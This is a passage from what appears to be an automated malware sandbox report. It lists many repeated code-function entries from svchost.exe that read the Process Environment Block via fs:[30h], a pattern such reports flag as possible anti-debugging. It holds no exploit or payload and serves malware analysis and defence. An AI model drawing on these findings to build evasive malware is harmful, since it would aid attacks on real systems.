                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402A0 mov eax, dword ptr fs:[00000030h]2_2_034402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034402A0 mov eax, dword ptr fs:[00000030h]2_2_034402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov ecx, dword ptr fs:[00000030h]2_2_034C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C62A0 mov eax, dword ptr fs:[00000030h]2_2_034C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov ecx, dword ptr fs:[00000030h]2_2_034C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C4144 mov eax, dword ptr fs:[00000030h]2_2_034C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C156 mov eax, dword ptr fs:[00000030h]2_2_0342C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C8158 mov eax, dword ptr fs:[00000030h]2_2_034C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436154 mov eax, dword ptr fs:[00000030h]2_2_03436154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03436154 mov eax, dword ptr fs:[00000030h]2_2_03436154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov ecx, dword ptr fs:[00000030h]2_2_034DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034DA118 mov eax, dword ptr fs:[00000030h]2_2_034DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F0115 mov eax, dword ptr fs:[00000030h]2_2_034F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460124 mov eax, dword ptr fs:[00000030h]2_2_03460124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F61C3 mov eax, dword ptr fs:[00000030h]2_2_034F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F61C3 mov eax, dword ptr fs:[00000030h]2_2_034F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov ecx, dword ptr fs:[00000030h]2_2_034AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE1D0 mov eax, dword ptr fs:[00000030h]2_2_034AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_035061E5 mov eax, dword ptr fs:[00000030h]2_2_035061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034601F8 mov eax, dword ptr fs:[00000030h]2_2_034601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03470185 mov eax, dword ptr fs:[00000030h]2_2_03470185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EC188 mov eax, dword ptr fs:[00000030h]2_2_034EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034EC188 mov eax, dword ptr fs:[00000030h]2_2_034EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B019F mov eax, dword ptr fs:[00000030h]2_2_034B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A197 mov eax, dword ptr fs:[00000030h]2_2_0342A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432050 mov eax, dword ptr fs:[00000030h]2_2_03432050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6050 mov eax, dword ptr fs:[00000030h]2_2_034B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345C073 mov eax, dword ptr fs:[00000030h]2_2_0345C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4000 mov ecx, dword ptr fs:[00000030h]2_2_034B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D2000 mov eax, dword ptr fs:[00000030h]2_2_034D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E016 mov eax, dword ptr fs:[00000030h]2_2_0344E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A020 mov eax, dword ptr fs:[00000030h]2_2_0342A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C020 mov eax, dword ptr fs:[00000030h]2_2_0342C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6030 mov eax, dword ptr fs:[00000030h]2_2_034C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B20DE mov eax, dword ptr fs:[00000030h]2_2_034B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342A0E3 mov ecx, dword ptr fs:[00000030h]2_2_0342A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034380E9 mov eax, dword ptr fs:[00000030h]2_2_034380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B60E0 mov eax, dword ptr fs:[00000030h]2_2_034B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C0F0 mov eax, dword ptr fs:[00000030h]2_2_0342C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034720F0 mov ecx, dword ptr fs:[00000030h]2_2_034720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343208A mov eax, dword ptr fs:[00000030h]2_2_0343208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C80A8 mov eax, dword ptr fs:[00000030h]2_2_034C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F60B8 mov eax, dword ptr fs:[00000030h]2_2_034F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F60B8 mov ecx, dword ptr fs:[00000030h]2_2_034F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346674D mov esi, dword ptr fs:[00000030h]2_2_0346674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346674D mov eax, dword ptr fs:[00000030h]2_2_0346674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346674D mov eax, dword ptr fs:[00000030h]2_2_0346674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430750 mov eax, dword ptr fs:[00000030h]2_2_03430750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE75D mov eax, dword ptr fs:[00000030h]2_2_034BE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472750 mov eax, dword ptr fs:[00000030h]2_2_03472750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472750 mov eax, dword ptr fs:[00000030h]2_2_03472750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B4755 mov eax, dword ptr fs:[00000030h]2_2_034B4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438770 mov eax, dword ptr fs:[00000030h]2_2_03438770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440770 mov eax, dword ptr fs:[00000030h]2_2_03440770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C700 mov eax, dword ptr fs:[00000030h]2_2_0346C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03430710 mov eax, dword ptr fs:[00000030h]2_2_03430710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03460710 mov eax, dword ptr fs:[00000030h]2_2_03460710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C720 mov eax, dword ptr fs:[00000030h]2_2_0346C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C720 mov eax, dword ptr fs:[00000030h]2_2_0346C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346273C mov eax, dword ptr fs:[00000030h]2_2_0346273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346273C mov ecx, dword ptr fs:[00000030h]2_2_0346273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346273C mov eax, dword ptr fs:[00000030h]2_2_0346273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AC730 mov eax, dword ptr fs:[00000030h]2_2_034AC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343C7C0 mov eax, dword ptr fs:[00000030h]2_2_0343C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B07C3 mov eax, dword ptr fs:[00000030h]2_2_034B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]2_2_034527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]2_2_034527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034527ED mov eax, dword ptr fs:[00000030h]2_2_034527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BE7E1 mov eax, dword ptr fs:[00000030h]2_2_034BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034347FB mov eax, dword ptr fs:[00000030h]2_2_034347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034347FB mov eax, dword ptr fs:[00000030h]2_2_034347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034D678E mov eax, dword ptr fs:[00000030h]2_2_034D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034307AF mov eax, dword ptr fs:[00000030h]2_2_034307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344C640 mov eax, dword ptr fs:[00000030h]2_2_0344C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F866E mov eax, dword ptr fs:[00000030h]2_2_034F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034F866E mov eax, dword ptr fs:[00000030h]2_2_034F866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A660 mov eax, dword ptr fs:[00000030h]2_2_0346A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A660 mov eax, dword ptr fs:[00000030h]2_2_0346A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03462674 mov eax, dword ptr fs:[00000030h]2_2_03462674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE609 mov eax, dword ptr fs:[00000030h]2_2_034AE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344260B mov eax, dword ptr fs:[00000030h]2_2_0344260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03472619 mov eax, dword ptr fs:[00000030h]2_2_03472619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0344E627 mov eax, dword ptr fs:[00000030h]2_2_0344E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03466620 mov eax, dword ptr fs:[00000030h]2_2_03466620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468620 mov eax, dword ptr fs:[00000030h]2_2_03468620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0343262C mov eax, dword ptr fs:[00000030h]2_2_0343262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A6C7 mov ebx, dword ptr fs:[00000030h]2_2_0346A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A6C7 mov eax, dword ptr fs:[00000030h]2_2_0346A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034AE6F2 mov eax, dword ptr fs:[00000030h]2_2_034AE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B06F1 mov eax, dword ptr fs:[00000030h]2_2_034B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B06F1 mov eax, dword ptr fs:[00000030h]2_2_034B06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434690 mov eax, dword ptr fs:[00000030h]2_2_03434690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03434690 mov eax, dword ptr fs:[00000030h]2_2_03434690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C6A6 mov eax, dword ptr fs:[00000030h]2_2_0346C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034666B0 mov eax, dword ptr fs:[00000030h]2_2_034666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438550 mov eax, dword ptr fs:[00000030h]2_2_03438550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03438550 mov eax, dword ptr fs:[00000030h]2_2_03438550
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]2_2_0346656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]2_2_0346656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346656A mov eax, dword ptr fs:[00000030h]2_2_0346656A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6500 mov eax, dword ptr fs:[00000030h]2_2_034C6500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03504500 mov eax, dword ptr fs:[00000030h]2_2_03504500
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03440535 mov eax, dword ptr fs:[00000030h]2_2_03440535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E53E mov eax, dword ptr fs:[00000030h]2_2_0345E53E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E5CF mov eax, dword ptr fs:[00000030h]2_2_0346E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E5CF mov eax, dword ptr fs:[00000030h]2_2_0346E5CF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034365D0 mov eax, dword ptr fs:[00000030h]2_2_034365D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A5D0 mov eax, dword ptr fs:[00000030h]2_2_0346A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A5D0 mov eax, dword ptr fs:[00000030h]2_2_0346A5D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345E5E7 mov eax, dword ptr fs:[00000030h]2_2_0345E5E7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034325E0 mov eax, dword ptr fs:[00000030h]2_2_034325E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C5ED mov eax, dword ptr fs:[00000030h]2_2_0346C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346C5ED mov eax, dword ptr fs:[00000030h]2_2_0346C5ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432582 mov eax, dword ptr fs:[00000030h]2_2_03432582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03432582 mov ecx, dword ptr fs:[00000030h]2_2_03432582
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03464588 mov eax, dword ptr fs:[00000030h]2_2_03464588
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E59C mov eax, dword ptr fs:[00000030h]2_2_0346E59C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]2_2_034B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]2_2_034B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B05A7 mov eax, dword ptr fs:[00000030h]2_2_034B05A7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034545B1 mov eax, dword ptr fs:[00000030h]2_2_034545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034545B1 mov eax, dword ptr fs:[00000030h]2_2_034545B1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346E443 mov eax, dword ptr fs:[00000030h]2_2_0346E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342645D mov eax, dword ptr fs:[00000030h]2_2_0342645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345245A mov eax, dword ptr fs:[00000030h]2_2_0345245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BC460 mov ecx, dword ptr fs:[00000030h]2_2_034BC460
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]2_2_0345A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]2_2_0345A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0345A470 mov eax, dword ptr fs:[00000030h]2_2_0345A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]2_2_03468402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]2_2_03468402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03468402 mov eax, dword ptr fs:[00000030h]2_2_03468402
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]2_2_0342E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]2_2_0342E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342E420 mov eax, dword ptr fs:[00000030h]2_2_0342E420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0342C427 mov eax, dword ptr fs:[00000030h]2_2_0342C427
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034B6420 mov eax, dword ptr fs:[00000030h]2_2_034B6420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0346A430 mov eax, dword ptr fs:[00000030h]2_2_0346A430
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034304E5 mov ecx, dword ptr fs:[00000030h]2_2_034304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034364AB mov eax, dword ptr fs:[00000030h]2_2_034364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034644B0 mov ecx, dword ptr fs:[00000030h]2_2_034644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034BA4B0 mov eax, dword ptr fs:[00000030h]2_2_034BA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6B40 mov eax, dword ptr fs:[00000030h]2_2_034C6B40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_034C6B40 mov eax, dword ptr fs:[00000030h]2_2_034C6B40
